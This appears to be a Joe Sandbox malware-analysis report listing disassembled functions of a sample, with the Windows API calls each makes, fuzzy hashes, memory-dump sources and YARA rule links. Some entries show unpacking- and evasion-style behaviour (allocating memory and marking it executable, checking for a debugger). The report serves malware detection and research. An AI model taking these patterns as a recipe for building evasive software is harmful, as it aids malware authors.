Opcode Fuzzy Hash: da68225fcfec134c8fd8d9451ae00da1071b16a447f748c41a2506d294de805f
Instruction Fuzzy Hash: 56311671D00209AFCB10DFA9DC80BAEBBF4FB48710F108129E555E7260D775A945EF94

Function 00F792CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F79314

Part of subcall function 00F79098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
Part of subcall function 00F79098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F79366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00F793C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F793F3

Strings

,, xrefs: 00F79344

Memory Dump Source

Source File: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 58e8c73032faa5c8acf50d594783a6317877b99d5e6ce9cf1b80596e3775aa58
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: 8F51FA75900609AFCB20DFA9CC81A9EBBF8FF08354F10C51AF959A7240D3B0E951DBA5

Function 00F792CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F79314

Part of subcall function 00F79098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
Part of subcall function 00F79098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F79366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00F793C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F793F3

Strings

,, xrefs: 00F79344

Memory Dump Source

Source File: 00000009.00000003.1602457648.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_f79000_2779421088.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 58e8c73032faa5c8acf50d594783a6317877b99d5e6ce9cf1b80596e3775aa58
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: 8F51FA75900609AFCB20DFA9CC81A9EBBF8FF08354F10C51AF959A7240D3B0E951DBA5

Function 00F70BA2 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00F70C27
__alloca_probe_16.LIBCMT ref: 00F70CF0
__freea.LIBCMT ref: 00F70D57

Part of subcall function 00F73511: HeapAlloc.KERNEL32(00000000,00F72586,00F743DB,?,00F72586,00000220,?,?,00F743DB), ref: 00F73543

__freea.LIBCMT ref: 00F70D6A
__freea.LIBCMT ref: 00F70D77

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e6a00ba1b71d7c2ed453bb3e9cfc126ef2c3d2597513af7e414c44b22826226b
Instruction ID: b38cf2b47710231129fed3d4deb36c9510e24bdabfa2860622487d1767723f8c
Opcode Fuzzy Hash: e6a00ba1b71d7c2ed453bb3e9cfc126ef2c3d2597513af7e414c44b22826226b
Instruction Fuzzy Hash: 6B51A272A00306EFDB319EA4CC85EBB76A9DF84760B15812BFD0CD6151EF74ED10A662

Function 00F6BCD2 Relevance: 6.1, APIs: 4, Instructions: 132
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F6C033: HeapAlloc.KERNEL32(?,00000008,00000001,?,00000000), ref: 00F6C069
Part of subcall function 00F6C033: _strlen.LIBCMT ref: 00F6C090
Part of subcall function 00F6C033: HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 00F6C1E4

HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00F6BD27
HeapAlloc.KERNEL32(00000000,00000008,00000015), ref: 00F6BDCE
HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00F6BE13

Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6

RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00F6BE54

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Heap$Alloc$Free$_strlen
String ID:
API String ID: 2043604496-0
Opcode ID: 469bdee212de16bb54f7bd191088b98364f72fd53a2808b12f10a2b989b16a8b
Instruction ID: 5408d7950252ebb8dcf7bed84794867e7f9a18a71228c029021dfba843397234
Opcode Fuzzy Hash: 469bdee212de16bb54f7bd191088b98364f72fd53a2808b12f10a2b989b16a8b
Instruction Fuzzy Hash: 7641EF76908306AFD7209F68CC51FABB7E8EF54314F04881CFA8992242E77AE954DB51

Function 00F6BC80 Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F6BC87
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F6BC9A
CloseHandle.KERNELBASE(00000000), ref: 00F6BCC7

Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: AllocCloseCreateEventHandleHeapObjectSingleWait
String ID:
API String ID: 783827187-0
Opcode ID: 9f0ff9e50633bc123882804361bd2a63da904bb1087c30115561b5b75e566940
Instruction ID: 48eaf4a2a0cf173cc79fb7d679960da572bc2eced5fa567bcad6783899b2844c
Opcode Fuzzy Hash: 9f0ff9e50633bc123882804361bd2a63da904bb1087c30115561b5b75e566940
Instruction Fuzzy Hash: 3FE06DB5A016127BD3112B349D09DBB776CFF917113084525FC11E2254DF64DD41E6B1

Function 00F6FFD4 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00F700DE,?,00F6FFCB,00000000,?,?,00F700DE,E62508BC,?,00F700DE), ref: 00F6FFE5
TerminateProcess.KERNEL32(00000000,?,00F6FFCB,00000000,?,?,00F700DE,E62508BC,?,00F700DE), ref: 00F6FFEC
ExitProcess.KERNEL32 ref: 00F6FFFE

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f6dc86ad780ae0148e1362705abcd48661f31a771fa84348b64235bfa3cc9751
Instruction ID: 80816ede5c0ff7d72edb2f3240a4c87f437842e87464798fc4d8840c415ea7c8
Opcode Fuzzy Hash: f6dc86ad780ae0148e1362705abcd48661f31a771fa84348b64235bfa3cc9751
Instruction Fuzzy Hash: F9D06C31408158EBCF112F70EC0DAED3F2AAF44365B588021B90D4A021CFBA9996BB96

Function 00F72782 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F722B9: GetOEMCP.KERNEL32(00000000,?,?,?,00F743DB), ref: 00F722E4

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F725C9,?,00000000,?,?,00F743DB), ref: 00F727E3
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F725C9,?,00000000,?,?,00F743DB), ref: 00F7281F

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f12a0d1f053847ac02a19ba1a7832d3b0d9532afd5becbe5f65ee323189c23f4
Instruction ID: 649c4e3e3422dad74e944632fd4a00283d845dadbe252cbfa76f79d85b121f63
Opcode Fuzzy Hash: f12a0d1f053847ac02a19ba1a7832d3b0d9532afd5becbe5f65ee323189c23f4
Instruction Fuzzy Hash: 82514471E002059EDB60CF76C8806BABBF5FF45310F18C16FD18A8B251E6799945EB93

Function 00F73D41 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00F70C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00F73D75
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00F70C92,?,?,-00000008,?,00000000), ref: 00F73D93

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 9c26def9ef6d42a7e5e5b799464056e50fdbcf8a7f3d6629b22114ec5f5091af
Instruction ID: 23f78c9ef0be518ecfeb7a351fc429dbbf0710a71a0ca6dd771cc010f3a6b525
Opcode Fuzzy Hash: 9c26def9ef6d42a7e5e5b799464056e50fdbcf8a7f3d6629b22114ec5f5091af
Instruction Fuzzy Hash: C3F07A3640421EBBCF125FA0DC09DEE3F26EF48360F058111FA1825020C736C931BB91

Function 00F79098 Relevance: 2.7, APIs: 2, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D

Memory Dump Source

Source File: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: b2a029351335262b0ff6c74b01caf4282a44249490952b64361042dbcbf9dfeb
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 81719F71D0824ADFDB41DF98C981BEDBBF0AF09314F248096E465F7241C274AA51EF65

Function 00F79098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D

Memory Dump Source

Source File: 00000009.00000003.1602457648.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_f79000_2779421088.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: b2a029351335262b0ff6c74b01caf4282a44249490952b64361042dbcbf9dfeb
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 81719F71D0824ADFDB41DF98C981BEDBBF0AF09314F248096E465F7241C274AA51EF65

Function 00F7238D Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,00F725C9,?), ref: 00F723BF

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: a353f9f61850c5a0a1a4ec8a506aacedfee184d13e8a67c42ee60049cc8b3cc1
Instruction ID: 00fc5dce1298dd1d66c3da89ba451ceee75e8c3988843e9fdfdae6a1e21cc3af
Opcode Fuzzy Hash: a353f9f61850c5a0a1a4ec8a506aacedfee184d13e8a67c42ee60049cc8b3cc1
Instruction Fuzzy Hash: 815147B1904158ABDB11CF28CC84BE9BBA9FB15310F1481EAE48D87143D3749E85EB62

Function 00F73B13 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44654bc2352e0714c8e6e2b72a40ff6b885f39e84e9ad3daf776a415a9f29fbe
Instruction ID: ef72554b49ad1f6099df5f81f44f8071baa62f668b056efbb9e305172776feda
Opcode Fuzzy Hash: 44654bc2352e0714c8e6e2b72a40ff6b885f39e84e9ad3daf776a415a9f29fbe
Instruction Fuzzy Hash: 8F01F933600228BB9B11CA6CFC80E5673A9E7C57207258126F909C7554EB31D901BB82

Non-executed Functions

Function 00F6CB32 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F6CB3E
IsDebuggerPresent.KERNEL32 ref: 00F6CC0A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6CC2A
UnhandledExceptionFilter.KERNEL32(?), ref: 00F6CC34

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5e74459749e2eb15363a981359530bbb41103ff38f7e1ae32e8ba962585e38b2
Instruction ID: 7dc6c381d5811fd992d3a1fe47def15e5d957f9805c6a1fa33c807134d6d80de
Opcode Fuzzy Hash: 5e74459749e2eb15363a981359530bbb41103ff38f7e1ae32e8ba962585e38b2
Instruction Fuzzy Hash: 96312975D0521C9BDB20DFA4DD89BDCBBB8BF08304F1040AAE44DAB250EB755A84DF44

Function 00F6CDD5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F6CDEB

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8ffaeae6ebb8ce44e0b1979794137af8652d54f793292d7bd3dba4d18d7cafd5
Instruction ID: a3a34612a8cd7f0956eb66ff35f9b927e773e5bff8177c95e25db39aa42382f7
Opcode Fuzzy Hash: 8ffaeae6ebb8ce44e0b1979794137af8652d54f793292d7bd3dba4d18d7cafd5
Instruction Fuzzy Hash: A3516AB1E112099FEB14CF99D8D57AABBF0FB48320F24812AD485EB250D3B59940DF90

Function 00F6E841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F6E960
___TypeMatch.LIBVCRUNTIME ref: 00F6EA6E
_UnwindNestedFrames.LIBCMT ref: 00F6EBC0
CallUnexpected.LIBVCRUNTIME ref: 00F6EBDB

Strings

csm, xrefs: 00F6E997
csm, xrefs: 00F6E8EB
csm, xrefs: 00F6E87E

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 33b841c2b1a7e8b973bd66d6781143f1138d38b80f95528903f586402f69449d
Instruction ID: d20acb434f56b5db1a805d9130b79d3a4c4a042829265413f9be6188fb9fd372
Opcode Fuzzy Hash: 33b841c2b1a7e8b973bd66d6781143f1138d38b80f95528903f586402f69449d
Instruction Fuzzy Hash: FFB18C3AD00209EFCF15DFA4C8819AEBBB5FF54320F14455AE8116B212D739EA51EF91

Function 00F6C033 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00F6C04D
HeapAlloc.KERNEL32(?,00000008,00000001,?,00000000), ref: 00F6C069
_strlen.LIBCMT ref: 00F6C090
___from_strstr_to_strchr.LIBCMT ref: 00F6C118
HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 00F6C1E4

Strings

!?#$%&()*+-,/:;<>=@[\]^`{|}~, xrefs: 00F6C0D4, 00F6C117, 00F6C1B3, 00F6C1BC

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Heap_strlen$AllocFree___from_strstr_to_strchr
String ID: !?#$%&()*+-,/:;<>=@[\]^`{|}~
API String ID: 355428601-2271055266
Opcode ID: 5f5c6271ee5b8229156ad417ed8f12aa467ea739950fa774d9fc17274302b01a
Instruction ID: 991d5e61f77755a0a00926ab5e6e64f03cb52abcca6d854ce8cb7b23bfa658e1
Opcode Fuzzy Hash: 5f5c6271ee5b8229156ad417ed8f12aa467ea739950fa774d9fc17274302b01a
Instruction Fuzzy Hash: EA5136769082449FE320DE29C8407BAB7E6EF57764F94051EE9C1CB203D325ED06ABC5

Function 00F6D940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F6D977
___except_validate_context_record.LIBVCRUNTIME ref: 00F6D97F
_ValidateLocalCookies.LIBCMT ref: 00F6DA08
__IsNonwritableInCurrentImage.LIBCMT ref: 00F6DA33
_ValidateLocalCookies.LIBCMT ref: 00F6DA88

Strings

csm, xrefs: 00F6DA1D

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
